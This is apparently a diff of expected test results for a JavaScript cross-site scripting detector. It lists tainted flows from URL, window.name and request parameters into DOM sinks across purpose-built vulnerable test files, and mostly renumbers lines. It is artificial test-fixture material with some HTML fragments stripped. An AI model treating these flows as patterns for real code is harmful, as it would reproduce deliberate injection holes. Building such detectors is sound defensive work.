-| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | -| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | -| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... 
.search | user-provided value | -| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... 
.search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... 
.search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... 
.search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... 
.search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... 
.search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... 
.search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... 
.search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... 
.search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | -| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | 
@@ -252,8 +252,8 @@ nodes | pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | | pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | | pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | | pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | | pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | @@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | 
@@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
